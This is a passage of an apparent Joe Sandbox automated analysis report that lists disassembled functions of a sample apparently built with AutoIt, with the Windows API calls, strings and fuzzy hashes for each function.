Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 123f85d82fda4f846e968682d7a8d256d334c653f442f58d5106ffdac658c832
Instruction ID: b83d7b64c3809ebccdd511a125d4f475ccfad78b1d80eb37a12033e831d4bddf
Opcode Fuzzy Hash: 123f85d82fda4f846e968682d7a8d256d334c653f442f58d5106ffdac658c832
Instruction Fuzzy Hash: 7B41B571A00619BEDF219AA4DC85FEFBBF9DF45710F0040B9B900B71C1DBB5AA058BA5

Function 00B12882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B12892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B128C8

Strings

|, xrefs: 00B12899

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: aa41589c18b4b9b80940043369390f6ab3977e36e8fe3e4e212d8ce16b1989e3
Instruction ID: 5b5170b1e700024cd4caa44cef67df2f07c00ad586cc1ac2c1d01dfe229cebdb
Opcode Fuzzy Hash: aa41589c18b4b9b80940043369390f6ab3977e36e8fe3e4e212d8ce16b1989e3
Instruction Fuzzy Hash: 72315971800119AFCF01EFA4DD85EEEBFB9FF09340F104069F814A6166EB355A96DBA0

Function 00B26CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B26D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B26DC2

Strings

static, xrefs: 00B26D22

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ef9b59374f8ad76d444e156e163c99b87ce67a694e7a429841fcd0d40042f4c2
Instruction ID: 77adc49b5d6cf367ba895678755aa699295934efac53b4b1300be226485f7f33
Opcode Fuzzy Hash: ef9b59374f8ad76d444e156e163c99b87ce67a694e7a429841fcd0d40042f4c2
Instruction Fuzzy Hash: 48317071200618AADB109F78DC80AFB77F9FF49760F108629F99997190DB31AC92CB60

Function 00B02D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B02E3B

Strings

0, xrefs: 00B02DF9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 0a1073e42db564cc0a64c3ffbea43af87c9a60b5bdef799e9735988840c8e5c1
Instruction ID: b3e6e34fe90dc4f66da5b48f763545c235fc2004a06c009fcd084701a78f383c
Opcode Fuzzy Hash: 0a1073e42db564cc0a64c3ffbea43af87c9a60b5bdef799e9735988840c8e5c1
Instruction Fuzzy Hash: 3931D531A40305ABEB248F58C989BAEBFF9EF05350F1440AEED85971E1DB709948CB50

Function 00B26943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B269D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B269DB

Strings

Combobox, xrefs: 00B2699D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 461e943cf7ef7d931a7f61b9435b3887329da16fcb9f4eaea681e286c2bb3ef8
Instruction ID: 0ba895129088e189d2a1eda0f751398b48591b542c33e8fff0056f7aebf1e679
Opcode Fuzzy Hash: 461e943cf7ef7d931a7f61b9435b3887329da16fcb9f4eaea681e286c2bb3ef8
Instruction Fuzzy Hash: 3611B2717002197FEF159F54DC80EBB37AAEB893A4F110164F95C9B290DA759C918BA0

Function 00B26E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

GetWindowRect.USER32(00000000,?), ref: 00B26EE0
GetSysColor.USER32(00000012), ref: 00B26EFA

Strings

static, xrefs: 00B26EBD

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 33f91df88478a214148b9e5d1e919cd3bed7bd1d84b2f50e03a3c90e4f74089c
Instruction ID: 68d162764505a52b69df448b9b33960455fd7895a80f2f37c4979d58a69fd9c9
Opcode Fuzzy Hash: 33f91df88478a214148b9e5d1e919cd3bed7bd1d84b2f50e03a3c90e4f74089c
Instruction Fuzzy Hash: 9F21447261021AAFDB04DFA8DD45AFA7BF8EB08314F104668F959D3250EB34E8619B60

Function 00B26B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B26C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B26C20

Strings

edit, xrefs: 00B26BF5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: f531814de7ceac29f3157231b8889f49ff0415f3d17a3ab20b5f7528550ca374
Instruction ID: dce08af34a1f4cf5cd48c070b1884dc3f0f75c29b74a621024b58b0de862981a
Opcode Fuzzy Hash: f531814de7ceac29f3157231b8889f49ff0415f3d17a3ab20b5f7528550ca374
Instruction Fuzzy Hash: AD119D71500118ABEB105E64AC8AEFA37A9EB05378F204764F968D71E0CB75DC919B60

Function 00B02E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B02F30

Strings

0, xrefs: 00B02F07

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: be3030fcfe3a845b5b4856954c5beb0692286f06b0755d3c9f1fc2c184a6606d
Instruction ID: 882c4bf19fd1d53434cb86108ab3c8d1b28745d43b91804a39324e235eaff37e
Opcode Fuzzy Hash: be3030fcfe3a845b5b4856954c5beb0692286f06b0755d3c9f1fc2c184a6606d
Instruction Fuzzy Hash: CA119032901115ABDF25DB98DC88BA97BF9EB05350F1440E6FD55A72E0DBB0AD088791

Function 00B124CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B12520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B12549

Strings

<local>, xrefs: 00B12511

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f2767674a817f2820f7c13098b86b036b47ea3fd37d91b5c859205c1c45b9998
Instruction ID: 31f4a17ad73c2f37b63729ab104ba272f793faf9d876589032065b31ec889300
Opcode Fuzzy Hash: f2767674a817f2820f7c13098b86b036b47ea3fd37d91b5c859205c1c45b9998
Instruction Fuzzy Hash: 6311E370100225FADB248F518CD9EFBFFE9FB26351F5081AAF90546140D27059A1D6E0

Function 00B180A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B180C8,?,00000000,?,?), ref: 00B18322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B180CB
htons.WSOCK32(00000000,?,00000000), ref: 00B18108

Strings

255.255.255.255, xrefs: 00B180E3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 4899d60570429fcc765a57802ace5545cfca25a49499327eecd29d1d440ae4c0
Instruction ID: 3e4bdf0fdf26c4c25992a0c8b363a9f2cebf85732956cdf4f964b92ae449a966
Opcode Fuzzy Hash: 4899d60570429fcc765a57802ace5545cfca25a49499327eecd29d1d440ae4c0
Instruction Fuzzy Hash: 6411E535600209ABCB20AF64CC86FFDB3B4FF08320F108566F911A72D1DB31A855C655

Function 00AF92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AF9355

Strings

ComboBox, xrefs: 00AF92F4
ListBox, xrefs: 00AF931F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 4f1edec8f14c012646c58d696f61c9e35c98227ecda19e33b4be6d5eba05c4b1
Instruction ID: 0fc34776495e2d6c52b850e2080b846caf10341ca49b31f1f4222470b36ddada
Opcode Fuzzy Hash: 4f1edec8f14c012646c58d696f61c9e35c98227ecda19e33b4be6d5eba05c4b1
Instruction Fuzzy Hash: 64019E71A45218AB8B04EBA4CC91DFF77B9BF06360B140759BA725B2D1EF31590CC660

Function 00AF91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AF924D

Strings

ComboBox, xrefs: 00AF91EC
ListBox, xrefs: 00AF9217

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b86b17328941fcb9d3f7995e0d18603ba67cef8503c550d18eb8e73517475c2f
Instruction ID: dc586636daa61cf0b9ed762579fbab0b8a4a147b01ef00ffa4d65b26c358cf98
Opcode Fuzzy Hash: b86b17328941fcb9d3f7995e0d18603ba67cef8503c550d18eb8e73517475c2f
Instruction Fuzzy Hash: D9018471A41208BBCB15EBE0CA96EFF73A89F16340F140059BA12672D2EF156F1C9671

Function 00AF9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00AF92D0

Strings

ComboBox, xrefs: 00AF9271
ListBox, xrefs: 00AF929C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9c69adf3746a019600328dde3828c591d2fb70c73554281af33dff222194b06d
Instruction ID: cba36e6a028dbd430e7b55f52cfaea16d64f19469a22ca24a40b1126848b5769
Opcode Fuzzy Hash: 9c69adf3746a019600328dde3828c591d2fb70c73554281af33dff222194b06d
Instruction Fuzzy Hash: B5018471A412087BCB05E7E4CA82EFF77A89F15340F1401557952631D1EB115F0C9275

Function 00B051CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B051E8
_wcscmp.LIBCMT ref: 00B051FA

Strings

#32770, xrefs: 00B051F4

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 84d5134551b3d160f3a722351021a74dc14daa345c28e4d0174a3628de0dfbd8
Instruction ID: dcf02eb9bb628a6fec9e7a10cbd75b37e8c3b33aedff1348b8ac4be40b55a4c5
Opcode Fuzzy Hash: 84d5134551b3d160f3a722351021a74dc14daa345c28e4d0174a3628de0dfbd8
Instruction Fuzzy Hash: 17E02B3290022916D7209A959C05FA7F7ECEB44721F0001AAFD10D3050D96099058BE1

Function 00AF81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AF81CA

Part of subcall function 00AC3598: _doexit.LIBCMT ref: 00AC35A2

Strings

Error allocating memory., xrefs: 00AF81C3
AutoIt, xrefs: 00AF81BE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e6ecd27b20630b1e94d77077b18a7698df3bfac3abd509e98119504f85bed741
Instruction ID: 583d42e3c8acc7f871d20a6b2f26f225d8f326470ccad6f6b713dbb0ebafeff0
Opcode Fuzzy Hash: e6ecd27b20630b1e94d77077b18a7698df3bfac3abd509e98119504f85bed741
Instruction Fuzzy Hash: EBD05B323C535C36D62533E86D07FD975888B05B52F504465BF08565D38ED559C242DD

Function 00ADB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00ADB564: _memset.LIBCMT ref: 00ADB571

Part of subcall function 00AC0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ADB540,?,?,?,00AA100A), ref: 00AC0B89

IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00ADB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00ADB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ADB54E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 940664e8261d2c7e148eaba510b13d081d2df14cce948625f999b18a02133b4b
Instruction ID: b3cd5ee8de342e4fa8e0ced9c46e61f251a9a5ef62c60dc96e6b4bf189e3cf7d
Opcode Fuzzy Hash: 940664e8261d2c7e148eaba510b13d081d2df14cce948625f999b18a02133b4b
Instruction Fuzzy Hash: CBE03970610311CBD320DF28E504B527BE0AB05704F018A6DE457C3360DBB4D505CBA1

Function 00B25BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B25BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B25C08

Part of subcall function 00B054E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0555E

Strings

Shell_TrayWnd, xrefs: 00B25BEE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
